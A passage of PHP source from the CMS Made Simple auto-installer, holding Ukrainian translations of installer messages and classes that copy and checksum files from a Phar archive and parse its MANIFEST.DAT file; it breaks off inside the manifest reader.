$lang['error_nositename'] = 'Назва сайту - це обов\'язковий параметр. Будь ласка, введіть підхожу назву для вашого веб-сайту.';
$lang['error_notimezone'] = 'Будь ласка, введіть дійсний часовий пояс для цього сервера';
$lang['error_overwrite'] = 'Проблеми з правами доступу: неможливо перезаписати %s';
$lang['error_sendingmail'] = 'Помилка при надсиланні пошти';
$lang['error_tzlist'] = 'Виникла проблема з отриманням списку ідентифікаторів часових поясів';
$lang['errorlevel_estrict'] = 'Перевірка E_STRICT';
$lang['errorlevel_edeprecated'] = 'Перевірка E_DEPRECATED';
$lang['edeprecated_enabled'] = 'E_DEPRECATED увімкнено у  error_reporting PHP. Хоча це не завадить роботі CMSMS, це може призвести до появи попереджень на екрані виводу, особливо старими модулями сторонніх розробників';
$lang['estrict_enabled'] = 'E_STRICT увімкнено у error_reporting PHP. Хоча це не завадить роботі CMSMS, це може призвести до того, що попередження відображатимуться у виводі HTML, особливо з більш старих модулів сторонніх розробників';
$lang['fail_assets_dir'] = 'Тека Аssets вже існує. Ця програма може записувати в цю теку для упорядкування розташування файлів. Будь ласка, переконайтеся, що у вас є резервна копія';
$lang['fail_assets_msg'] = 'Тека Аssets вже існує. Ця програма може записувати в цю теку для упорядкування розташування файлів. Будь ласка, переконайтеся, що у вас є резервна копія';
$lang['fail_config_writable'] = 'Процес HTTP не може записати до файлу config.php. Будь ласка, спробуйте змінити права доступу на цей файл на 777 до завершення процесу оновлення';
$lang['fail_curl_extension'] = 'Розширення curl не знайдено. Хоча це не є критичною проблемою, це може спричинити проблеми з деякими сторонними модулями';
$lang['fail_database_support'] = 'Не знайдено сумісних драйверів бази даних';
$lang['fail_file_get_contents'] = 'Функція file_get_contents не існує або вимкнена. CMSMS неможливо продовжити (навіть інсталятор, ймовірно, не зможе).';
$lang['fail_file_uploads'] = 'Можливості завантаження файлів вимкнені у цьому середовищі. Деякі функції CMSMS не працюватимуть у цьому середовищі';
$lang['fail_func_json'] = 'Функцію json не знайдено';
$lang['fail_func_gzopen'] = 'Функцію gzopen не знайдено';
$lang['fail_func_md5'] = 'Функцію md5 не знайдено';
$lang['fail_func_tempnam'] = 'Функція tempnam не існує. Вона обов\'язкова для функціонування CMSMS';
$lang['fail_func_ziparchive'] = 'Функцію ZipArchive не знайдено. Це може обмежити функціональність';
$lang['fail_ini_set'] = 'Схоже, що ми не можемо змінювати налаштування ini. Це може спричинити проблеми в сторонніх модулях (або, якщо ввімкнути режим зневаджування (debug mode))';
$lang['fail_magic_quotes_runtime'] = 'Схоже, у вашій конфігурації увімкнено magic quotes. Вимкніть їх і повторіть спробу';
$lang['fail_max_execution_time'] = 'Ваш максимальний час виконання %s не відповідає мінімальному значенню %s. Рекомендуємо збільшити його до %s або більше.';
$lang['fail_memory_limit'] = 'Ваш ліміт пам\'яті занадто низький. Ви мали %s, хоча потрібна мінімальна кількість %s, а рекомендується %s';
$lang['fail_multibyte_support'] = 'Підтримку Multibyte не ввімкнено у вашій конфігурації';
$lang['fail_output_buffering'] = 'Буфер виводу не активовано.';
$lang['fail_open_basedir'] = 'Діють відкриті обмеження basedir. CMSMS вимагає, щоб їх було відключено';
$lang['fail_php_version'] = 'Версія PHP, доступна для CMSMS, є надзвичайно важливою. Мінімальна прийнятна версія - %s, хоча ми рекомендуємо %s або новішу. У вас зараз - %s';
$lang['fail_post_max_size'] = 'Ваш максимальний розмір відправки (post_max_size) %s не відповідає мінімальному значенню %s. Рекомендовано значення %s або більше, та переконайтеся, що воно більше, ніж upload_max_filesize';
$lang['fail_pwd_writable2'] = 'Процес HTTP повинен мати можливість записувати до теки призначення (а також до всіх файлів та підпорядкованих тек) для інсталяції файлів. Ми не маємо дозволу на запис (принаймні) %s';
$lang['fail_register_globals'] = 'Будь ласка, вимкніть register_globals в конфігурації PHP';
$lang['fail_remote_url'] = 'Ми виявили проблеми з підключенням до віддаленої URL-адреси. Це обмежить функціональність CMS Made Simple';
$lang['fail_safe_mode'] = 'CMSMS не буде працювати належним чином в середовищі, де активований safe mode (безпечний режим). Safe mode вважається застарілим і його буде видалено в майбутніх версіях PHP';
$lang['fail_session_save_path_exists'] = 'Шлях до збереження сесій недійсний або тека не існує';
$lang['fail_session_save_path_writable'] = 'Тека для збереження сесій не доступна для запису';
$lang['fail_session_use_cookies'] = 'CMSMS вимагає налаштування PHP для збереження ключа сесії у файлі cookie';
$lang['fail_tmpfile'] = 'Функція tmpfile() не працює. Вона необхідна для розпакування архівів. Ви можете викристати аргумент TMPDIR в URL-адресі, щоб вказати інсталятору на специфічну теку, в яку можна записати. Див. файл README, який повинен бути включений до цієї теки.';
$lang['fail_tmp_dirs_empty'] = 'Тимчасові теки CMSMS <em>(tmp/cache and tmp/templates_c)</em> існують і не порожні. Будь-ласка, видаліть або замініть їх';
$lang['fail_xml_functions'] = 'Розширення XML не знайдено. Будь ласка, увімкніть його у своєму середовищі PHP';
$lang['failed'] = 'не пройдено';
$lang['file_get_contents'] = 'Тестування функції file_get_contents';
$lang['file_installed'] = 'Інстальовано %s';
$lang['file_uploads'] = 'Перевірка підтримки вивантаження файлів';
$lang['finished_custom_freshen_msg'] = 'Вашу систему CMSMS поновлено! Основні файли оновлено та створено новий файл конфігурації. Будь ласка, відвідайте веб-сайт, щоб переконатися, що все працює правильно';
$lang['finished_custom_install_msg'] = 'Завершено! Будь ласка, відвідайте свій веб-сайт і увійдіть до адмін. панелі.';
$lang['finished_custom_upgrade_msg'] = 'Завершено! Будь ласка, відвідайте адмін. панель CMSMS та фронтенд, щоб переконатися, що все працює правильно.<br/><strong>Підказка:</strong>Зараз ідеальний час для створення ще одної резервної копії.';
$lang['finished_freshen_msg'] = 'Вашу систему поновлено! Основні файли оновлено та створено новий файл конфігурації. Тепер ви можете <a href="%s">відвідати ваш веб-сайт</a> або увійти до <a href="%s">адмін. панелі CMSMS</a>.';
$lang['finished_install_msg'] = 'Завершено! Тепер ви можете <a href="%s">відвідати ваш веб-сайт</a> або увійти до <a href="%s">адмін. панелі CMSMS</a>.';
$lang['finished_upgrade_msg'] = 'Завершено! Будь ласка, відвідайте <a href="%s">фронтенд веб-сайту</a> та <a href="%s">адмін. панель</a>, щоб переконатися, що все працює правильно. Можливо, вам також доведеться оновити деякі сторонні модулі.<br/><strong>Підказка:</strong>Не забудьте створити ще одну резервну копію після переконання, що все працює добре.';
$lang['freshen'] = 'Поновити (полагодити) встановлену систему';
$lang['func_json'] = 'Перевірка функції кодування та декодування json';
$lang['func_md5'] = 'Перевірка функції md5';
$lang['func_tempnam'] = 'Перевірка функції tempnam';
$lang['func_gzopen'] = 'Перевірка функції gzopen';
$lang['func_ziparchive'] = 'Перевірка функції ziparchive';
$lang['gd_version'] = 'Версія GD';
$lang['goback'] = 'Назад';
$lang['info_addlanguages'] = 'Виберіть мови (на додачу до англійської) для інсталяції. <strong>Примітка:</strong> не всі переклади завершено, але українська точно є!.';
$lang['info_adminaccount'] = 'Будь ласка, надайте облікові дані для першого користувача-адміністратора. Цей обліковий запис буде мати доступ до всіх функцій адмін. панелі CMSMS.';
$lang['info_advanced'] = 'Розширений режим дозволяє використовувати більше параметрів у процедурі інсталяції.';
$lang['info_dbinfo'] = 'CMS Made Simple зберігає великий обсяг даних у базі даних. З\'єднання з базою даних є обов\'язковим. Окрім того, користувач бази даних повинен мати ВСІ ДОЗВОЛИ в зазначеній базі даних, щоб дозволити створення, знищення та зміну таблиць, індексів та виводу даних.';
$lang['info_errorlevel_edeprecated'] = 'E_DEPRECATED - параметр звітування про помилки PHP, який вказує на те, що попередження повинні відображатися щодо коду, який використовує застарілі методи. Незважаючи на те, що ядро CMSMS намагається перевіряти, чи ми більше не використовуємо застарілі методи, деякі модулі цього не роблять. Ми рекомендуємо вимкнути цей параметр у конфігурації PHP';
$lang['info_errorlevel_estrict'] = 'E_STRICT - параметр для звітування про помилки PHP, який вказує на те, що слід поважати строгі стандарти кодування. Хоча основне ядро CMSMS намагається відповідати стандартам E_STRICT, деякі модулі цього не роблять. Ми рекомендуємо вимкнути цей параметр у конфігурації PHP';
$lang['info_installcontent'] = 'За замовчуванням цей інсталятор створює серію зразків сторінок, таблиць стилів і шаблонів у CMSMS. Зразок сторінки надає розгорнуту інформацію та поради, які допоможуть створити веб-сайти за допомогою CMSMS, його корисно прочитати. Однак, якщо ви вже знайомі з CMS Made Simple, вимкнувши цю опцію, ви отримаєте мінімальний набір шаблонів, таблиць стилів та вміст сторінок.';
$lang['info_open_basedir_session_save_path'] = 'open_basedir увімкнено у вашій конфігурації PHP. Ми не змогли правильно оцінити можливість використання сесій. Однак, перехід до цього моменту в процесі інсталяції, ймовірно, вказує на те, що сесії працюють нормально.';
$lang['info_pwd_writable'] = 'Ця програма потребує дозвіл на запис до поточної робочої теки';
$lang['info_queryvar'] = 'Змінна запиту (GET) використовується всередині CMSMS для ідентифікації запитуваної сторінки. У більшості випадків вам не потрібно буде це коригувати.';
$lang['info_sitename'] = 'Назва веб-сайту використовується в шаблонах за замовчуванням як частина заголовка. Будь ласка, введіть людську читабельну назву для веб-сайту';
$lang['info_timezone'] = 'Інформація про часовий пояс потрібна для показу обчислень дати та часу. Будь ласка, виберіть часовий пояс сервера';
$lang['ini_set'] = 'Перевірка, чи можемо ми змінити налаштування INI';
$lang['install'] = 'Інсталювати';
$lang['install_attachstylesheets'] = 'Приєднати таблиці стилів до тем';
$lang['install_backupconfig'] = 'Резервне копіювання файлу конфігурації';
$lang['install_createassets'] = 'Створити структуру теки/assets';
$lang['install_created_index'] = 'Створено індекс %s ...%s';
$lang['install_create_tables'] = 'Створити таблиці бази даних';
$lang['install_createconfig'] = 'Створити новий файл конфігурації';
$lang['install_createcontentpages'] = 'Створити сторінки за замовчуванням';
$lang['install_created_table'] = 'Створено таблицю %s: ....%s';
$lang['install_createtablesindexes'] = 'Створення таблиць та індексів';
$lang['install_createtmpdirs'] = 'Створити тимчасові теки';
$lang['install_creating_index'] = 'Створено індекс %s';
$lang['install_default_collections'] = 'Інсталювати колекції за замовчуванням';
$lang['install_defaultcontent'] = 'Інсталювати вміст за замовчуванням';
$lang['install_detectlanguages'] = 'Виявити встановлені мови';
$lang['install_dropping_tables'] = 'Знищення таблиць';
$lang['install_dummyindexhtml'] = 'Створити файли dummy index.html';
$lang['install_extractfiles'] = 'Розпакувати файли з архіву';
$lang['install_initevents'] = 'Створити події';
$lang['install_initsitegroups'] = 'Створити початкові групи';
$lang['install_initsiteperms'] = 'Встановити початкові дозволи';
$lang['install_initsiteprefs'] = 'Встановити початкові параметри сайту';
$lang['install_initsiteusers'] = 'Створити початковий обліковий запис користувача';
$lang['install_initsiteusertags'] = 'Стартовий набір UDT (теґи користувача)';
$lang['install_module'] = 'Інсталювати модуль %s';
$lang['install_modules'] = 'Інсталювати доступні модулі';
$lang['install_passwordsalt'] = 'Встановити фразу шифру для паролів (password salt)';
$lang['install_requireddata'] = 'Встановити необхідні початкові дані';
$lang['install_schema'] = 'Створити схему бази даних';
$lang['install_setschemaver'] = 'Встановити схему версії';
$lang['install_setsequence'] = 'Скинути таблиці послідовностей (sequence tables)';
$lang['install_setsitename'] = 'Встановити назву сайту';
$lang['install_stylesheets'] = 'Створити таблиці стилів за замовчуванням';
$lang['install_templates'] = 'Створити шаблони за замовчуванням';
$lang['install_templatetypes'] = 'Створити стандартні типи шаблонів';
$lang['install_update_sequences'] = 'Оновити таблиці послідовностей (sequence tables)';
$lang['install_updatehierarchy'] = 'Оновити позиції ієрархії вмісту';
$lang['install_updateseq'] = 'Оновити послідовність для %s';
$lang['installer_ver'] = 'Версія інсталятора';
$lang['legend'] = 'Легенда';
$lang['magic_quotes_runtime'] = 'Переконайтеся, що magic quotes вимкнено';
$lang['max_execution_time'] = 'Перевірка максимального часу виконання PHP скрипта';
$lang['meaning'] = 'Значення';
$lang['memory_limit'] = 'Перевірка, чи достатній ліміт пам\'яті PHP';
$lang['msg_clearedcache'] = 'Кеш сервера очищено';
$lang['msg_configsaved'] = 'Існуючий файл конфігурації збережено в %s';
$lang['msg_upgrade_module'] = 'Оновлення версії модуля %s';
$lang['msg_upgrademodules'] = 'Оновлення версії модулів';
$lang['msg_yourvalue'] = 'У вас зараз: %s';
$lang['multibyte_support'] = 'Перевірити наявність підтримки multibyte';
$lang['next'] = 'Продовжити';
$lang['no'] = 'Ні';
$lang['none'] = 'Жоден';
$lang['open_basedir'] = 'Обмеження open_basedir';
$lang['open_basedir_session_save_path'] = 'open_basedir включено. Неможливо перевірити шлях до збереження сесій.';
$lang['output_buffering'] = 'Переконайтеся, що буфер виводу активовано';
$lang['pass_config_writable'] = 'Процес HTTP має дозвіл на запис до файлу config.php';
$lang['pass_database_support'] = 'Знайдено принаймні один сумісний драйвер бази даних';
$lang['pass_func_json'] = 'Виявлено функцію json';
$lang['pass_func_md5'] = 'Виявлено функцію md5';
$lang['pass_func_tempnam'] = 'Функція tempnam існує';
$lang['pass_multibyte_support'] = 'Здається, підтримку Multibyte вимкнено';
$lang['pass_php_version'] = 'На даний момент налаштована версія PHP не відповідає мінімальним вимогам. Потрібно, як мінімум, PHP %s, хоча ми рекомендуємо %s або більше';
$lang['pass_pwd_writable'] = 'Процес HTTP може записувати у теку призначення. Це необхідно для розпакування файлів';
$lang['password'] = 'Пароль';
$lang['ph_sitename'] = 'Введіть назву сайту';
$lang['php_version'] = 'Версія PHP';
$lang['post_max_size'] = 'Перевірка максимальної кількості даних, які можна опублікувати в одному запиті';
$lang['prompt_addlanguages'] = 'Додаткові мови';
$lang['prompt_createtables'] = 'Створити таблиці бази даних';
$lang['prompt_dbhost'] = 'Інформація про ім\'я сервера бази даних';
$lang['prompt_dbinfo'] = 'Інформація про базу даних';
$lang['prompt_dbname'] = 'Назва бази даних';
$lang['prompt_dbpass'] = 'Пароль';
$lang['prompt_dbport'] = 'Номер порту бази даних';
$lang['prompt_dbprefix'] = 'Префікс назви таблиць бази даних';
$lang['prompt_dbtype'] = 'Тип бази даних';
$lang['prompt_dbuser'] = 'Ім\'я користувача';
$lang['prompt_dir'] = 'Тека для інсталяції';
$lang['prompt_installcontent'] = 'Встановити зразки вмісту';
$lang['prompt_queryvar'] = 'Змінна запиту (GET)';
$lang['prompt_sitename'] = 'Назва веб-сайту';
$lang['prompt_timezone'] = 'Часовий пояс сервера';
$lang['pwd_writable'] = 'Тека доступна для запису';
$lang['queue_for_upgrade'] = 'Додано в чергу сторонній модуль %s для оновлення на наступному кроці.';
$lang['readme_uc'] = 'README';
$lang['register_globals'] = 'Переконайтеся, що "register globals" вимкнено';
$lang['remote_url'] = 'Перевірте, чи можемо ми робити вихідні HTTP-з\'єднання';
$lang['repeatpw'] = 'Повторіть пароль';
$lang['reset_site_preferences'] = 'Скиданути деякі налаштування сайту';
$lang['reset_user_settings'] = 'Скинути параметри користувача';
$lang['retry'] = 'Повторити спробу';
$lang['safe_mode'] = 'Перевірка, чи "safe mode" вимкнено';
$lang['saltpasswords'] = 'Зашифрувати паролі (Salt Passwords)';
$lang['select_language'] = 'Перше, що ми попросимо зробити - це вибрати бажану мову зі списку нижче. Це для зручності під час процесу інсталяції, але це не вплине на вашу інсталяцію CMSMS.';
$lang['send_admin_email'] = 'Надіслати дані облікового запису адміністратора електронною поштою';
$lang['session_capabilities'] = 'Перевірка належних можливостей сесій (сесії використовують файли cookie і шлях до збереження сесії доступний для запису, тощо)';
$lang['session_save_path_exists'] = 'Session_save_path існує';
$lang['session_save_path_writable'] = 'Session_save_path доступний для запису';
$lang['session_use_cookies'] = 'Переконайтеся, що сесії PHP використовують cookies';
$lang['sometests_failed'] = 'Ми провели численні перевірки вашого поточного веб-середовища. Хоча не було виявлено жодних критичних проблем, ми рекомендуємо виправити наступні елементи, перш ніж продовжувати.';
$lang['step1_advanced'] = 'Розширений режим';
$lang['step1_destdir'] = 'Вибрати теку';
$lang['step1_info_destdir'] = '<strong>Попередження:</strong> Ця програма може інсталювати або оновити декілька систем CMS Made Simple. Важливо, щоб ви вибрали правильну теку для інсталяції або оновлення.';
$lang['step1_language'] = 'Вибрати мову';
$lang['step1_title'] = 'Вибрати мову';
$lang['step2_cmsmsfound'] = 'найдено вже встановлену систему CMS Made Simple . Можна оновити цю систему. Проте, перш ніж продовжувати, переконайтеся, що у вас є поточна резервна копія всіх файлів та бази даних';
$lang['step2_cmsmsfoundnoupgrade'] = 'Хоча було знайдено вже встановлену систему CMS Made Simple, неможливо оновити цю версію за допомогою цієї програми. Версія може бути занадто старою. Спробуйте спочатку оновити до проміжної версії.';
$lang['step2_confirminstall'] = 'Ви впевнені, що хочете інсталювати CMS Made Simple';
$lang['step2_confirmupgrade'] = 'Ви впевнені, що хочете оновити CMS Made Simple';
$lang['step2_errorsamever'] = 'Схоже, що вибрана тека містить систему CMSMS з тією ж версією, яка включена в цей скрипт. Продовження поновить/полагодить систему.';
$lang['step2_errortoonew'] = 'Схоже, що вибрана тека містить систему CMSMS з версією новішою, ніж в цьому скрипті інсталяції. Неможливо продовжити';
$lang['step2_info_freshen'] = 'Поновлення/полагодження системи передбачає заміну всіх основних файлів і відтворення конфігурації. Вам буде запропоновано основні базові налаштування, однак база даних буде нетронута.';
$lang['step2_installdate'] = 'Орієнтовна дата системи';
$lang['step2_install_dirnotempty2'] = 'Ця тека вже містить деякі файли та/або підтеки. Хоча сюди й можна інсталювати CMSMS, це може призвести до пошкодження існуючої програми. Будь ласка, двічі перевірте вміст цієї теки. Для довідкових цілей деякі файли вказані нижче. Переконайтеся, що все правильно.';
$lang['step2_hdr_upgradeinfo'] = 'Інформація про версію';
$lang['step2_info_upgradeinfo'] = 'Нижче наведено доступні відомості про випуск та журнал змін для кожного випуску. Кнопки нижче відобразять детальну інформацію про те, що змінилося в кожній версії CMS Made Simple. У кожній версії можуть з\'явитися додаткові вказівки чи попередження, які можуть вплинути на процес оновлення.';
$lang['step2_minupgradever'] = 'Мінімальна версія, з якої ця програма може оновити: %s. Вам може знадобитися оновити свою програму до нової версії поетапно, використовуючи інший спосіб, перш ніж завершити процес оновлення. Перш ніж використовувати будь-який метод оновлення, будь ласка, переконайтесь, що у вас є повноцінна підтверджена резервна копія.';
$lang['step2_nocmsms'] = 'У цій теці ми не знайшли систему CMS Made Simple. Схоже, що це нова інсталяція';
$lang['step2_nofiles'] = 'За бажанням, основні файли CMSMS не будуть оброблятися під час цього процесу';
$lang['step2_passed'] = 'Пройдено';
$lang['step2_pwd'] = 'Ваш поточна робоча тека';
$lang['step2_schemaver'] = 'Версія схеми бази даних';
$lang['step2_version'] = 'Ваша версія';
$lang['step3_failed'] = 'Цей пакет виконав численні перевірки вашого середовища PHP, і одну або декілька перевірок не пройдено. Вам потрібно буде виправити ці помилки у вашій конфігурації, перш ніж продовжувати. Після того, як ви виправите помилки, натисніть & quot;Повторити спробу" нижче.';
$lang['step3_passed'] = 'Цей пакет виконав численні перевірки вашого середовища PHP, і всі вони пройдені. Це чудова новина! Хоча це не є всеохоплюючою перевіркою, ви не повинні зіткнутися з жодними труднощами під час роботи основної системи CMSMS.';
$lang['step9_removethis'] = '<strong>Попередження:</strong> З міркувань безпеки важливо видалити цей скрипт інсталяції з теки, доступної для перегляду браузером, як тільки ви підтвердите, що операція виконана.';
$lang['symbol'] = 'Символ';
$lang['social_message'] = 'Я успішно інсталював CMS Made Simple!';
$lang['test_failed'] = 'Необхідну перевірку не пройдено';
$lang['test_passed'] = 'Перевірку пройдено <em>(пройдені перевірки відображаються лише в розширеному режимі)</em>';
$lang['test_warning'] = 'Параметр перевищує необхідне значення, але нижче рекомендованого, або ... <br />Можливості, які можуть знадобитися для деяких додаткових функцій, недоступні';
$lang['th_status'] = 'Статус';
$lang['th_testname'] = 'Перевірка';
$lang['th_value'] = 'Значення';
$lang['title_error'] = 'Х\'юстон, у нас проблема!';
$lang['title_step2'] = 'Крок 2 - Виявлення існуючого програмного забезпечення';
$lang['title_step3'] = 'Крок 3 - Перевірки';
$lang['title_step4'] = 'Крок 4 - Базові налаштування';
$lang['title_step5'] = 'Крок 5 - Інформація про обліковий запис адміністратора';
$lang['title_step6'] = 'Крок 6 - Налаштування сайту';
$lang['title_step7'] = 'Крок 7 - Інсталяція програмних файлів';
$lang['title_step8'] = 'Крок 8 - Робота бази даних';
$lang['title_step9'] = 'Крок 9 - Завершення';
$lang['title_welcome'] = 'Ласкаво просимо!';
$lang['title_forum'] = 'Форум підтримки';
$lang['title_docs'] = 'Офіційна документація';
$lang['title_api_docs'] = 'Офіційна документація API';
$lang['to'] = 'до';
$lang['title_share'] = 'Поділитися своїм досвідом з друзями.';
$lang['tmpfile'] = 'Перевірка роботи tmpfile()';
$lang['tmp_dirs_empty'] = 'Переконайтеся, що тимчасові теки порожні або не існують';
$lang['upgrade'] = 'Оновити версію';
$lang['upgrade_deleteoldevents'] = 'Видалення старих подій';
$lang['upgrading_schema'] = 'Оновлення схеми бази даних';
$lang['upload_max_filesize'] = 'Перевірка максимального розміру завантажених файлів';
$lang['username'] = 'Ім\'я користувача';
$lang['warn_disable_functions'] = 'Примітка: одну або декілька основних функцій PHP відключено. Це може негативно вплинути на вашу систему CMSMS, зокрема на сторонні модулі. Будь ласка, уважно стежте за журналом помилок. Ваші вимкнені функції: <br /><br />%s';
$lang['warn_max_execution_time'] = 'Хоч ваш максимальний час виконання %s відповідає або перевищує мінімальне значення %s, рекомендуємо збільшити його до %s або більше';
$lang['warn_memory_limit'] = 'Ваш ліміт пам\'яті %s перевищує мінімальне значення %s. Однак рекомендується значення %s';
$lang['warn_open_basedir'] = 'open_basedir увімкнено у вашій конфігурації php. Хоч ви можете продовжувати, CMSMS не підтримуватиме інсталяцію з обмеженнями open_basedir.';
$lang['warn_post_max_size'] = 'Ваш максимальний розмір відправки (post_max_size) %s перевищує мінімальне значення %s, однак рекомендується %s. Будь ласка, переконайтеся, що це значення більше, ніж upload_max_filesize';
$lang['warn_tests'] = '<strong>Примітка:</strong> Передача всіх цих перевірок повинна забезпечити правильність функціонування CMSMS для більшості сайтів. Але, оскільки сайт зростає та додаються нові можливості, ці мінімальні значення можуть стати недостатніми. Крім того, сторонні модулі можуть мати додаткові вимоги для правильного функціонування.';
$lang['warn_upload_max_filesize'] = 'Хоча ваш параметр %s є достатнім, ми рекомендуємо збільшити параметр upload_max_filesize у PHP, принаймні до %s';
$lang['welcome_message'] = 'Ласкаво просимо! Це автоматичний механізм інсталяції CMS Made Simple. Цей пакет дозволить вам швидко і легко підтвердити, що ваш веб-хост сумісний з CMSMS, а також інсталювати або оновити до останньої версії CMS Made Simple.<br />Ви будете в захваті!';
$lang['wizard_step1'] = 'Ласкаво просимо!';
$lang['wizard_step2'] = 'Виявити існуюче програмне забезпечення';
$lang['wizard_step3'] = 'Тести на сумісность';
$lang['wizard_step4'] = 'Налаштування';
$lang['wizard_step5'] = 'Інформація про обліковий запис адміністратора';
$lang['wizard_step6'] = 'Налаштування сайту';
$lang['wizard_step7'] = 'Файли';
$lang['wizard_step8'] = 'Робота бази даних';
$lang['wizard_step9'] = 'Завершено';
$lang['xml_functions'] = 'Перевірка функції XML';
$lang['yes'] = 'Так';
?><?php

namespace cms_autoinstaller;

abstract class filehandler
{
  private $_destdir;
  private $_output_fn;
  private $_languages;
  
  /**
   * @throws \Exception
   */
  protected function get_config()
  {
    return \__appbase\get_app()->get_config();
  }

  public function set_destdir($destdir)
  {
    if( !\is_dir($destdir) ) throw new \RuntimeException(\__appbase\lang('error_dirnotvalid', $destdir));
    if( !\is_writable($destdir) ) throw new \RuntimeException(\__appbase\lang('error_dirnotvalid', $destdir));
    $this->_destdir = $destdir;
  }

  public function get_destdir()
  {
    if( !$this->_destdir ) throw new \RuntimeException(\__appbase\lang('error_nodestdir'));
    return $this->_destdir;
  }

  public function set_languages($lang)
  {
    if( !\is_array($lang) ) return;
    $this->_languages = $lang;
  }

  public function get_languages()
  {
    return $this->_languages;
  }

  public function set_output_fn($fn)
  {
    if( !\is_callable($fn) ) throw new \RuntimeException(\__appbase\lang('error_internal', 1102));
    $this->_output_fn = $fn;
  }

  public function output_string($txt)
  {
    if( $this->_output_fn ) \call_user_func($this->_output_fn, $txt);
  }
  
  /**
   * @throws \Exception
   */
  protected function is_excluded($filespec)
  {
    $filespec = \trim($filespec);
    if( !$filespec ) throw new \RuntimeException(\__appbase\lang('error_internal', 1101));
    $config = $this->get_config();
    if( !isset($config['install_excludes']) ) return FALSE;

    $excludes = \explode('||', $config['install_excludes']);
    foreach( $excludes as $excl ) {
      if( \preg_match($excl, $filespec) ) return TRUE;
    }
  }

  protected function dir_exists($filespec)
  {
    $filespec = \trim($filespec);
    if( !$filespec ) throw new \Exception(\__appbase\lang('error_invalidparam','filespec'));

    $dn = \dirname($filespec);
    $tmp = $this->get_destdir()."/$dn";
    return \is_dir($tmp);
  }

  protected function create_directory($filespec)
  {
    $filespec = \trim($filespec);
    if( !$filespec ) throw new \Exception(\__appbase\lang('error_invalidparam','filespec'));

    $dn = \dirname($filespec);
    $tmp = $this->get_destdir()."/$dn";
    return @\mkdir($tmp, 0777, TRUE);
  }

  protected function is_imagefile($filespec)
  {
      // this method uses (ugly) extensions because we cannot rely on finfo_open being available.
      $image_exts = ['bmp','jpg','jpeg','gif','png','svg','webp','ico'];
      $ext = \strtolower(\substr(\strrchr($filespec, '.'), 1));
      return \in_array($ext, $image_exts);
  }
  
  /**
   * @throws \Exception
   */
  protected function is_langfile($filespec)
  {
    $filespec = \trim($filespec);
    if( !$filespec ) throw new \RuntimeException(\__appbase\lang('error_invalidparam', 'filespec'));

    if( $this->is_imagefile($filespec) ) return FALSE;
    $bn = \basename($filespec);
    $dn = \dirname($filespec);
    $fnmatch = 0;
    $fnmatch = $fnmatch || \preg_match('/^[a-zA-Z]{2}_[a-zA-Z]{2}\.php$/', $bn);
    $fnmatch = $fnmatch || \preg_match('/^[a-zA-Z]{2}_[a-zA-Z]{2}\.nls\.php$/', $bn);
    if( $fnmatch ) return \substr($bn, 0, strpos($bn, '.'));

    $nls = \__appbase\get_app()->get_nls();
    if( !\is_array($nls) ) return FALSE; // problem

    $bn = \substr($bn, 0, strpos($bn, '.'));
    $last_dn = \basename($dn);
    foreach( $nls['alias'] as $alias => $code ) {
      if( $bn == $alias ) return $code;
    }
    foreach( $nls['htmlarea'] as $code => $short ) {
      if( $bn == $short ) return $code;
    }

    return FALSE;
  }
  
  /**
   * @throws \Exception
   */
  protected function is_accepted_lang($filespec)
  {
    $res = $this->is_langfile($filespec);
    if( !$res ) return FALSE;

    $langs = $this->get_languages();
    if(!\is_array($langs) || 0 == \count($langs)) return TRUE;

    return \in_array($res, $langs);
  }

  abstract public function handle_file($filespec,$srcspec,\PharFileInfo $fi);
}

?><?php

namespace cms_autoinstaller;

class install_filehandler extends \cms_autoinstaller\filehandler
{
  public function handle_file($filespec,$srcspec,\PharFileInfo $fi)
  {
    if( $this->is_excluded($filespec) ) return;
    if( $this->is_langfile($filespec) ) {
      if( !$this->is_accepted_lang($filespec) ) return;
    }

    if( !$this->dir_exists($filespec) ) $this->create_directory($filespec);

    $destname = $this->get_destdir().$filespec;
    if(\file_exists($destname) && !\is_writable($destname) ) throw new \RuntimeException(\__appbase\lang('error_overwrite', $filespec));

    $cksum = \md5_file($srcspec);
    @\copy($srcspec, $destname);
    $cksum2 = \md5_file($destname);
    if( $cksum != $cksum2 ) throw new \RuntimeException(\__appbase\lang('error_checksum', $filespec));

    $this->output_string(\__appbase\lang('file_installed',$filespec));
  }
}

?>
<?php

namespace cms_autoinstaller;

class manifest_reader
{
  private $_filename;
  private $_compressed;
  private $_generated;
  private $_from_version;
  private $_from_name;
  private $_to_version;
  private $_to_name;
  private $_has_read = FALSE;
  private $_added    = [];
  private $_changed  = [];
  private $_deleted  = [];
  
  public function __construct($dir)
  {
    if( !\is_dir($dir) )
    {
      throw new \RuntimeException(\__appbase\lang('error_internal', 'mr100'));
    }
    
    $fn = "$dir/MANIFEST.DAT.gz";
    if(\file_exists($fn))
    {
      $this->_filename   = $fn;
      $this->_compressed = TRUE;
    }
    else
    {
      $fn = "$dir/MANIFEST.DAT";
      if(\file_exists($fn))
      {
        $this->_filename   = $fn;
        $this->_compressed = FALSE;
      }
      else
      {
        throw new \Exception(\__appbase\lang('error_internal', 'mr101'));
      }
    }
  }
  
  protected function handle_header($line)
  {
    $cols = \explode(':',$line);
    foreach( $cols as &$col ) {
      $col = \trim($col);
    }
    if(2 != \count($cols))
    {
      throw new \RuntimeException(\__appbase\lang('error_internal', 'mr105'));
    }
    
    switch( $cols[0] ) {
      case 'MANIFEST_GENERATED':
        $this->_generated = (int)$cols[1];
      break;
      case 'MANIFEST FROM VERSION':
        $this->_from_version = $cols[1];
      break;
      case 'MANIFEST FROM NAME':
        $this->_from_name = $cols[1];
      break;
      case 'MANIFEST TO VERSION':
        $this->_to_version = $cols[1];
      break;
      case 'MANIFEST TO NAME':
        $this->_to_name = $cols[1];
      break;
    }
  }
  
  protected function handle_added($fields)
  {
    $this->_added[] = ['filename' => $fields[2], 'checksum' => $fields[1]];
  }
  
  protected function handle_changed($fields)
  {
    $this->_changed[] = ['filename' => $fields[2], 'checksum' => $fields[1]];
  }
  
  protected function handle_deleted($fields)
  {
    $this->_deleted[] = ['filename' => $fields[2], 'checksum' => $fields[1]];
  }
  
  protected function handle_line($line)
  {
    if( !$line ) return;
    if( \__appbase\startswith($line,'MANIFEST') ) return $this->handle_header($line);
    
    $fields = \explode(' :: ',$line);
    if(3 != count($fields)) throw new \RuntimeException(\__appbase\lang('error_internal', 'mr103'));
    
    switch( $fields[0] ) {
      case 'ADDED':
        return $this->handle_added($fields);
      break;
      case 'CHANGED':
        return $this->handle_changed($fields);
      break;
      case 'DELETED':
        return $this->handle_deleted($fields);
      break;
      default:
